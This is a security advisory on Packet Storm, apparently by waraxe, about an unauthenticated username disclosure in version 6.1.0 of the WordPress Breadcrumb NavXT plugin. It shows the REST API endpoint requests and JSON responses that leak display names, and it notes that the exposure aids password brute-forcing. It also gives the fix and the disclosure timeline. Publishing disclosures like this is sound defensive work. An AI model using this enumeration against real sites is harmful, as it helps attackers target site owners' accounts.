what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Breadcrumb NavXT 6.1.0 Username Disclosure

WordPress Breadcrumb NavXT 6.1.0 Username Disclosure
Posted Sep 27, 2018
Authored by Janek Vind aka waraxe | Site waraxe.us

WordPress Breadcrumb NavXT plugin version 6.1.0 suffers from a username disclosure vulnerability.

tags | exploit
SHA-256 | a7d331bc7a3c3c5f71c497eb152d46ea8fb5956444bfa1d2462d1d680b57b936

WordPress Breadcrumb NavXT 6.1.0 Username Disclosure

Change Mirror Download

[waraxe-2018-SA#108] - Username Disclosure in Breadcrumb NavXT Wordpress plugin
================================================================================

Author: Janek Vind "waraxe"
Date: 26. September 2018
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-108.html

Target description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Breadcrumb NavXT, the successor to the popular WordPress plugin Breadcrumb
Navigation XT, was written from the ground up to be better than its ancestor.
This plugin generates locational breadcrumb trails for your WordPress powered
blog or website. These breadcrumb trails are highly customizable to suit the
needs of just about any website running WordPress.

https://wordpress.org/plugins/breadcrumb-navxt/

Vulnerable version: 6.1.0
Fixed version: 6.2.0
Active installations: 700 000+

###############################################################################
1. Wordpress Username Disclosure via REST API function "author"
###############################################################################

Breadcrumb NavXT plugin provides REST API functionality:

http://localhost/wp498/wp-json/bcn/v1

Let's look at REST API function "author":

/bcn/v1/author/(?P<id>\d+)":{
"namespace":"bcn/v1",
"methods":[
"GET",
"OPTIONS"
],
"endpoints":[
{
"methods":[
"GET",
"OPTIONS"
],
"args":{
"id":{
"required":true,
"description":"The ID of the author to retrieve the breadcrumb trail for.",
"type":"integer"
}
}
}
]
}

http://localhost/wp498/wp-json/bcn/v1/author/1

{"@context":"http:\/\/schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"http:\/\/localhost\/wp498","name":"Test site"}},{"@type":"ListItem","position":2,"item":{"@id":"","name":"root"}}]}

http://localhost/wp498/wp-json/bcn/v1/author/4

{"@context":"http:\/\/schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"http:\/\/localhost\/wp498","name":"Test site"}},{"@type":"ListItem","position":2,"item":{"@id":"","name":"editor"}}]}

As seen above, Wordpress usernames "root" and "editor" are exposed in API responses.
Closer look at the source code of Breadcrumb NavXT plugin reveals that information exposed
is actually Wordpress user's "display_name", which can be either username or nickname.
By default "display_name" equals to username, but user can change this behavior in "Profile"
menu option "Display name publicly as".

API function "author" can be accessed in unauthenticated state and as result anyone can
list Wordpress usernames without registering or having an account on website.
Wordpress authentication is based on two pieces of information - username and password.
It's possible to launch password bruteforce attack when username is known.

How to fix: upgrade Breadcrumb NavXT Wordpress plugin to version 6.2.0.
In this new version API endpoints are disabled by default.
It's also possible to completely disable Breadcrumb NavXT REST API by setting
BCN_DISABLE_REST_API to true in a site's configuration file "wp-config.php",
as described in https://mtekk.us/archives/guides/disabling-breadcrumb-navxts-rest-api/


Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

13.09.2018 -> First email sent to developers
13.09.2018 -> Got first response from developers
13.09.2018 -> Sending detailed information to developers
25.09.2018 -> Found problems are fixed, new version available
26.09.2018 -> Waraxe advisory released

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/
Personal homepage: http://www.janekvind.com/
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close